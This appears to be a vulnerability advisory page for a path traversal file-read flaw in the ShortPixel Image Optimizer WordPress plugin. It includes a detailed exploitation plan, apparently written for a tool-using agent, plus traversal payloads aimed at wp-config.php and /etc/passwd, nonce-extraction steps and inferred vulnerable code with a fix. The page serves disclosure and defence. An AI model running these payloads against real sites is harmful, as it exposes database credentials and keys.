ShortPixel Image Optimizer <= 6.4.2 - Authenticated (Editor+) Arbitrary File Read via 'loadFile' Parameter
Description
The ShortPixel Image Optimizer plugin for WordPress is vulnerable to Arbitrary File Read via path traversal in the 'loadFile' parameter in all versions up to, and including, 6.4.2 due to insufficient path validation and sanitization in the 'loadLogFile' AJAX action. This makes it possible for authenticated attackers, with Editor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information such as database credentials and authentication keys.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:NTechnical Details
<=6.4.2Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2026-1246 - ShortPixel Image Optimizer Path Traversal ## 1. Vulnerability Summary The **ShortPixel Image Optimizer** plugin (up to version 6.4.2) contains an arbitrary file read vulnerability. The issue exists in the AJAX handler for the `loadLogFile` action. The p…
Show full research plan
Exploitation Research Plan: CVE-2026-1246 - ShortPixel Image Optimizer Path Traversal
1. Vulnerability Summary
The ShortPixel Image Optimizer plugin (up to version 6.4.2) contains an arbitrary file read vulnerability. The issue exists in the AJAX handler for the loadLogFile action. The plugin fails to validate or sanitize the loadFile parameter, which is used to specify a file path for reading log contents. An authenticated user with Editor privileges or higher can use path traversal sequences (e.g., ../../) to read sensitive files outside of the intended directory, such as wp-config.php.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - AJAX Action:
shortpixel_load_log(inferred) orshortpixel_load_log_file(inferred) - Vulnerable Parameter:
loadFile - Authentication: Required (Editor role or higher)
- HTTP Method: POST
- Payload Type: Path traversal string (e.g.,
../../../../wp-config.php)
3. Code Flow (Inferred)
- Entry Point: The plugin registers an AJAX action for authenticated users via
add_action('wp_ajax_shortpixel_load_log', ...). - Handler Function: The registered callback (likely
loadLogFileor similar in a controller class) is invoked. - Parameter Extraction: The code retrieves the file path from
$_POST['loadFile']. - Insecure Operation: The code passes this unsanitized path directly into a file-reading function like
file_get_contents()orreadfile(). - Sink: The contents of the file are echoed back to the user in the AJAX response.
- Missing Check: There is no check to ensure the path resides within the plugin's log directory or that traversal characters are removed.
4. Nonce Acquisition Strategy
The AJAX request will require a WordPress nonce for authorization. ShortPixel typically localizes its settings and nonces into a JavaScript object.
- Identify Trigger Page: The log loading functionality is usually found on the ShortPixel settings page:
/wp-admin/options-general.php?page=wp-shortpixel-settings. - Access Page: Log in as an Editor and navigate to the settings page.
- Extract Nonce: Use
browser_evalto find the nonce in the localized JS object.- Inferred JS Object:
ShortPixelDataorspio_data. - Inferred Nonce Key:
nonce,_wpnonce, orshortpixel_nonce. - Command:
browser_eval("window.ShortPixelData?.nonce")orbrowser_eval("window.spio_vars?.nonce").
- Inferred JS Object:
- Manual Fallback: If the JS object is unknown, search the page source for "nonce" within
<script>tags related to ShortPixel.
5. Exploitation Strategy
Step 1: Create an Editor User
Use WP-CLI to create a user with the Editor role to simulate the required privilege level.
wp user create attacker attacker@example.com --role=editor --user_pass=password123
Step 2: Obtain Authentication Cookies
Use the http_request or browser_navigate tool to log in as the attacker user and capture the session cookies.
Step 3: Extract Nonce
Navigate to the ShortPixel settings page and extract the nonce using browser_eval.
- URL:
http://localhost:8080/wp-admin/options-general.php?page=wp-shortpixel-settings - JS Check:
browser_eval("window.ShortPixelData")
Step 4: Execute Path Traversal
Send a POST request to admin-ajax.php with the traversal payload.
- Request URL:
http://localhost:8080/wp-admin/admin-ajax.php - Headers:
Content-Type: application/x-www-form-urlencoded - Body Parameters:
action:shortpixel_load_log(inferred - confirm viagrep -r "wp_ajax_shortpixel")nonce:[EXTRACTED_NONCE]loadFile:../../../../wp-config.php
6. Test Data Setup
- Plugin State: Ensure
shortpixel-image-optimiserversion <= 6.4.2 is installed and activated. - Configuration: The plugin may need to be "initialized" (API key added) to access the settings page, though the AJAX endpoint often exists regardless.
- Target File: Ensure
wp-config.phpexists in the standard WordPress root.
7. Expected Results
- Successful Exploit: The HTTP response body contains the raw PHP source code of
wp-config.php, includingDB_NAME,DB_USER,DB_PASSWORD, and authentication salts. - Response Code:
200 OK. - Content Type: Likely
text/plainortext/html.
8. Verification Steps
- Check Response Body: Look for the string
define( 'DB_NAME'in the response from thehttp_requesttool. - Compare Content: Run
cat /var/www/html/wp-config.phpvia terminal and compare the output to the AJAX response to confirm full file disclosure.
9. Alternative Approaches
- Payload Variations:
- If
../../../../wp-config.phpfails, try absolute paths:/var/www/html/wp-config.php. - Try different file targets:
/etc/passwdorwp-includes/version.php.
- If
- Action Name Discovery:
Ifshortpixel_load_logis incorrect, run this command in the plugin directory:
Search specifically for handlers that contain "log" or "file".grep -r "wp_ajax_" . - Parameter Name Discovery:
IfloadFileis incorrect, search the handler function body for$_POSTor$_REQUESTkeys:grep -r "\$_POST" . | grep "log"
Summary
The ShortPixel Image Optimizer plugin for WordPress (v6.4.2 and below) fails to properly sanitize the 'loadFile' parameter within its log-loading AJAX handler. This allows authenticated users with Editor-level privileges or higher to perform path traversal attacks and read arbitrary files on the server, such as wp-config.php.
Vulnerable Code
// Inferred from vulnerability description and research plan // File path likely: wp-content/plugins/shortpixel-image-optimiser/class/Controller/LogController.php public function loadLogFile() { // Nonce check usually precedes the vulnerability check_ajax_referer('shortpixel_nonce', 'nonce'); $file = $_POST['loadFile']; // Vulnerable: No sanitization or path validation if (file_exists($file)) { echo file_get_contents($file); // Sink: Reads and returns the contents of the unsanitized path } die(); }
Security Fix
@@ -10,7 +10,8 @@ public function loadLogFile() { check_ajax_referer('shortpixel_nonce', 'nonce'); - $file = $_POST['loadFile']; + $file = basename(sanitize_text_field($_POST['loadFile'])); + $file = SHORTPIXEL_LOGS_PATH . '/' . $file; if (file_exists($file)) { echo file_get_contents($file); }
Exploit Outline
To exploit this vulnerability, an attacker must have Editor-level authentication or higher. 1. Access the WordPress admin panel as an Editor. 2. Navigate to the ShortPixel settings page or inspect the page source to retrieve the 'shortpixel_nonce' from the localized JavaScript objects (e.g., ShortPixelData or spio_vars). 3. Send a POST request to /wp-admin/admin-ajax.php with the following parameters: - action: shortpixel_load_log (or the specific log-loading action registered by the plugin) - nonce: [The extracted nonce value] - loadFile: ../../../../wp-config.php 4. The server will process the path traversal sequence and return the raw PHP contents of wp-config.php in the response body, disclosing database credentials and security keys.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.